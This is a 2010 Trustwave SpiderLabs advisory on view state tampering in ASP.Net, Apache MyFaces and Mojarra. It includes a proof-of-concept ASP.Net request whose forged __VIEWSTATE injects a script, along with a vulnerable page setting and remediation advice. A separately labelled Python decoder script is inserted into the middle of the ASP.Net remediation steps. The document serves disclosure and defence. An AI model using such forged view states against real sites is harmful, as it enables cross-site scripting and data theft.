ASP.Net View State Tampering Vulnerabilities

Trustwave's SpiderLabs Security Advisory TWSL2010-001:
Multiplatform View State Tampering Vulnerabilities

Published: 2010-02-08
Version: 1.1

SpiderLabs has documented view state tampering vulnerabilities in three
products from separate vendors.

View states are used by some web application frameworks to store the
state of HTML GUI controls. View states are typically stored in hidden
client-side input fields, although server-side storage is widely
supported.

The affected vendors generally recommend that client-side view states
are cryptographically signed and/or encrypted, but specific exploits
have not been previously documented. These vulnerabilities show that
unsigned client-side view states will ALWAYS result in a vulnerability
in the affected products.

Credit: David Byrne of Trustwave's SpiderLabs

===============================================

Vendor: Microsoft (http://www.microsoft.com)
Product: ASP.Net (http://www.asp.net)
Versions affected: .Net 3.5 is confirmed vulnerable; previous versions
   are likely to be vulnerable as well.

Description:

ASP.Net is a web-application development framework that provides for
both user interfaces and back-end functionality.

The ASP.Net view state is typically stored in a hidden field named
"__VIEWSTATE". When a page's view state is not cryptographically
signed, many standard .Net controls are vulnerable to Cross-Site
Scripting (XSS) through the view state.

It is well documented that using an unsigned view state is "bad", but
most previous advisories focus on vaguely described threats or on
vulnerabilities introduced by custom use of the view state. To the best
of Trustwave's knowledge, this is the first time a proof-of-concept
attack of this nature has been demonstrated against the view state. A
vulnerability was alluded to in a 2004 Microsoft article on
troubleshooting view state problems [1]. However, other Microsoft
documents recommend disabling view state signing "if performance is a
key consideration" [2, 3, 4] or for various other reasons [5, 6].
Realistically, unsigned view states should never be used in a
production environment.

The following code is vulnerable to an XSS attack against the form
control. Note that the "ValidateRequest" setting does not prevent the
attack.

   <%@ Page EnableViewStateMac="False"
        ValidateRequest="True" %>
   <html runat="server">
      <form runat="server"/>
   </html>

If the following request is sent to the server, the response will
contain JavaScript that calls an alert box.

xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2BZGQ=

The view state's XML equivalent is below:

   <?xml version="1.0" encoding="utf-16"?>
   <viewstate>
     <Pair>
       <Pair>
         <String>-834067820</String>
         <Pair>
           <ArrayList>
             <Int32>0</Int32>
             <Pair>
               <ArrayList>
                 <Int32>1</Int32>
                 <Pair>
                   <ArrayList>
                     <IndexedString>innerhtml</IndexedString>
                     <String>&lt;script&gt;alert('xss')&lt;/script&gt;</String>
                   </ArrayList>
                 </Pair>
               </ArrayList>
             </Pair>
           </ArrayList>
         </Pair>
       </Pair>
     </Pair>
   </viewstate>

The HTML response is below:

   <html>
     <form name="ctl01" method="post"
           action="xss.aspx" id="ctl01">
   <div>
   <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
   value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
   </div>
   <script>alert('xss')</script></form>
   </html>

This example uses the "innerhtml" attribute of the form control,
although other attributes in other controls are also vulnerable to
similar attacks.

Remediation Steps:

The ASP.Net view state should always be cryptographically signed with
a "Message Authentication Code" (MAC). This has been enabled by default
since .Net 1.1, but can be disabled using the "EnableViewStateMac"
setting.
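The __VIEWSTATE value in the request above is nothing more than a serialized object graph; without a MAC the server has no way to tell the attacker's copy from its own, which is why the "innerhtml" value is applied as-is. The following Python script is an added example and is not part of the advisory: it decodes the ObjectStateFormatter stream behind a __VIEWSTATE value (the token numbers are those used by ASP.Net's ObjectStateFormatter; only the tokens ordinary control trees use are handled, and an encrypted view state will not decode at all), reports how many bytes follow the root object, and lists every string that carries HTML markup. Run on the advisory's proof-of-concept value it reproduces the XML dump shown above and reports zero trailing bytes. The remark in the code that a MAC-protected view state leaves its HMAC (20 bytes for the SHA1 default) after the root object is an assumption used as a heuristic, not something the script verifies cryptographically.

```python
import base64
import struct
import urllib.parse

# Token values of ASP.Net's ObjectStateFormatter, the serializer behind __VIEWSTATE.
TOKEN_INT16, TOKEN_INT32, TOKEN_BYTE, TOKEN_STRING = 1, 2, 3, 5
TOKEN_DATETIME, TOKEN_DOUBLE, TOKEN_SINGLE = 6, 7, 8
TOKEN_PAIR, TOKEN_TRIPLET, TOKEN_STRING_ARRAY, TOKEN_ARRAYLIST = 15, 16, 21, 22
TOKEN_HASHTABLE, TOKEN_INDEXED_STRING_ADD, TOKEN_INDEXED_STRING = 23, 30, 31
TOKEN_NULL, TOKEN_EMPTY_STRING, TOKEN_ZERO_INT32 = 100, 101, 102
TOKEN_TRUE, TOKEN_FALSE = 103, 104


class ViewStateDecoder:
    """Decodes the subset of tokens that ordinary control trees use."""

    def __init__(self, data: bytes, pos: int = 0):
        self.data, self.pos = data, pos
        self.strings = []  # string table filled by IndexedStringAdd

    def _take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError("truncated view state")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def _int7(self) -> int:
        # 7-bit variable-length integer: low bits first, high bit means "more".
        result, shift = 0, 0
        while True:
            b = self._take(1)[0]
            result |= (b & 0x7F) << shift
            if not b & 0x80:
                # negative Int32 values are written as their unsigned 32-bit form
                return result - (1 << 32) if result >= (1 << 31) else result
            shift += 7

    def _string(self) -> str:
        return self._take(self._int7()).decode("utf-8")

    def read_value(self):
        token = self._take(1)[0]
        if token == TOKEN_PAIR:
            return ("Pair", self.read_value(), self.read_value())
        if token == TOKEN_TRIPLET:
            return ("Triplet", self.read_value(), self.read_value(), self.read_value())
        if token == TOKEN_ARRAYLIST:
            return [self.read_value() for _ in range(self._int7())]
        if token == TOKEN_STRING_ARRAY:
            return [self._string() for _ in range(self._int7())]
        if token == TOKEN_HASHTABLE:
            entries = []
            for _ in range(self._int7()):
                key = self.read_value()       # key is serialized before its value
                entries.append((key, self.read_value()))
            return ("Hashtable", entries)
        if token == TOKEN_STRING:
            return self._string()
        if token == TOKEN_INDEXED_STRING_ADD:
            self.strings.append(self._string())
            return self.strings[-1]
        if token == TOKEN_INDEXED_STRING:
            return self.strings[self._int7()]
        if token == TOKEN_INT32:
            return self._int7()
        if token == TOKEN_INT16:
            return struct.unpack("<h", self._take(2))[0]
        if token == TOKEN_BYTE:
            return self._take(1)[0]
        if token == TOKEN_DOUBLE:
            return struct.unpack("<d", self._take(8))[0]
        if token == TOKEN_SINGLE:
            return struct.unpack("<f", self._take(4))[0]
        if token == TOKEN_DATETIME:
            return ("DateTime", struct.unpack("<q", self._take(8))[0])  # DateTime.ToBinary()
        simple = {TOKEN_NULL: None, TOKEN_EMPTY_STRING: "", TOKEN_ZERO_INT32: 0,
                  TOKEN_TRUE: True, TOKEN_FALSE: False}
        if token in simple:
            return simple[token]
        raise ValueError(f"unsupported token 0x{token:02x} at offset {self.pos - 1}")


def decode_viewstate(encoded: str) -> dict:
    """Decode a __VIEWSTATE value taken from a request (URL-encoded) or page source.
    Returns the object tree and the number of bytes left after the root object.
    Assumption used as a heuristic: an unsigned state ends exactly at the root
    object, while a MAC'd one leaves the HMAC trailer (20 bytes for SHA1) behind."""
    raw = base64.b64decode(urllib.parse.unquote(encoded))
    if raw[:2] != b"\xff\x01":
        raise ValueError("no FF 01 ObjectStateFormatter header: encrypted or not a view state")
    dec = ViewStateDecoder(raw, pos=2)
    tree = dec.read_value()
    return {"tree": tree, "trailing_bytes": len(raw) - dec.pos}


def find_markup_strings(node) -> list:
    """Return every string in the tree containing an HTML tag, the kind of value
    an XSS payload plants in a control property such as innerhtml."""
    if isinstance(node, str):
        return [node] if "<" in node and ">" in node else []
    if isinstance(node, (tuple, list)):
        return [s for child in node for s in find_markup_strings(child)]
    return []


# Proof-of-concept value from the advisory, in its URL-encoded request form.
ADVISORY_VIEWSTATE = ("/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ%2B"
                      "YWxlcnQoJ3hzcycpPC9zY3JpcHQ%2BZGQ=")

if __name__ == "__main__":
    result = decode_viewstate(ADVISORY_VIEWSTATE)
    print("tree:", result["tree"])
    print("trailing bytes:", result["trailing_bytes"])
    print("markup strings:", find_markup_strings(result["tree"]))
```

Decoding __VIEWSTATE values captured from a proxy log or WAF this way is a quick check on whether a page actually round-trips an unsigned state and on what data it carries through the client; a state that fails at the header check is encrypted, which is the stronger configuration.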
Using the "ViewStateUserKey" setting can also help to mitigate the
scope of this vulnerability. [7]

===============================================

Vendor: Apache Software Foundation (http://www.apache.org)
Product: Apache MyFaces (http://myfaces.apache.org/)
Versions affected: 1.2.8 and 1.1.7 are confirmed as vulnerable. All
   previous versions are likely vulnerable.
Related products: Some versions of IBM WebSphere Application Server
   (at least 6.x and 7.x) ship with Apache MyFaces [8, 9]

Description:

MyFaces is an open source implementation of the JavaServer Faces
standard. JavaServer Faces [10] is a framework that aids in developing
user interfaces for web-based applications.

When the application's view state is not encrypted, it is possible for
an attacker to supply a new or modified view object as part of a
request. The malicious view can contain arbitrary HTML code (allowing
Cross-Site Scripting) and arbitrary Expression Language (EL) [11]
statements that will be executed on the server. The EL statements can
be used to read data stored in user-scoped session variables and in
application- or server-scoped variables. Since these variables should
be inaccessible to the user, it is not uncommon to store sensitive data
in them.

Exploiting this vulnerability requires modification of the serialized
view object, which is not stored in a plaintext format. The Deface
tool [12] can be used to provide proof-of-concept attacks.

Remediation Steps:

This vulnerability can be completely prevented by encrypting the
application's view state. [13] This should always be performed, even
if this specific vulnerability is remediated by Apache.

===============================================

Vendor: Sun Microsystems (http://www.sun.com)
Product: Mojarra (https://javaserverfaces.dev.java.net/)
Versions affected: 1.2_14 and 2.0.2 are confirmed as vulnerable.
   All previous versions are likely vulnerable.
Related products: Some versions of IBM WebSphere Application Server
   (at least 6.x and 7.x) ship with Sun Mojarra [8, 9]
   Although not well documented, some versions of Caucho Resin
   (at least 4.x) ship with Sun Mojarra [14]

Description:

Mojarra is the open source reference implementation of the JavaServer
Faces standard. JavaServer Faces [10] is a framework that aids in
developing user interfaces for web-based applications.

When the application's view state is not encrypted, it is possible for
an attacker to supply a new or modified view object as part of a
request. The malicious view can contain arbitrary HTML code (allowing
Cross-Site Scripting) and arbitrary Expression Language (EL) [11]
statements that will be executed on the server. The EL statements can
be used to disclose data stored in user-scoped session variables and
in application- or server-scoped variables. Since these variables are
usually inaccessible to the user, it is not uncommon to store sensitive
data in them.

Exploiting this vulnerability requires modification of the serialized
view object, which is not stored in a plain-text format. Techniques
similar to those used in the Deface tool [12] can provide
proof-of-concept attacks.

Remediation Steps:

This vulnerability can be completely prevented by encrypting the
application's view state. [15] This should always be performed, even
if this specific vulnerability is remediated by Sun.

===============================================

References

1. http://support.microsoft.com/kb/829743
2. http://msdn.microsoft.com/en-us/library/system.web.configuration.pagessection.enableviewstatemac.aspx
3. http://msdn.microsoft.com/en-us/library/ydy4x04a.aspx
4. http://msdn.microsoft.com/en-us/library/ms691344.aspx
5. http://technet.microsoft.com/en-us/library/cc732610.aspx
6. http://technet.microsoft.com/en-us/library/dd807062%28WS.10%29.aspx
7. http://msdn.microsoft.com/en-us/library/ms178199(VS.85).aspx
8. http://publib.boulder.ibm.com/infocenter/wasinfo/v6r1/topic/com.ibm.websphere.express.doc/info/exp/ae/cweb_javaserver_faces.html
9. http://publib.boulder.ibm.com/infocenter/wasinfo/v7r0/topic/com.ibm.websphere.express.iseries.doc/info/iseriesexp/ae/cweb_javaserver_faces.html
10. http://java.sun.com/javaee/javaserverfaces/
11. http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JSPIntro7.html
12. https://www.trustwave.com/spiderLabs-tools.php
13. http://wiki.apache.org/myfaces/Secure_Your_Application
14. http://www.caucho.com/resin-javadoc/com/caucho/jsf/integration/Mojarra12InjectionProvider.html
15. http://192.9.76.37/Wiki.jsp?page=JavaServerFacesRI

Revision History:

1.0 Initial publication (2010-02-03)
1.1 Added information about IBM WebSphere and Caucho Resin (2010-02-08)

About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world.
For organizations faced with today's challenging data security and
compliance environment, Trustwave provides a unique approach with
comprehensive solutions that include its flagship TrustKeeper
compliance management software and other proprietary security
solutions. Trustwave has helped thousands of organizations, ranging
from Fortune 500 businesses and large financial institutions to small
and medium-sized retailers, manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North
America, South America, Europe, Africa, Asia and Australia. For more
information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:

SpiderLabs is the advanced security team at Trustwave responsible for
incident response and forensics, penetration testing, application
security and security research for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of
ethical hacking exercises and tested the security of hundreds of
business applications for Fortune 500 organizations. For more
information visit https://www.trustwave.com/spiderlabs

Disclaimer:

The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and
fitness for a particular purpose. In no event shall Trustwave or its
suppliers be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or
special damages, even if Trustwave or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/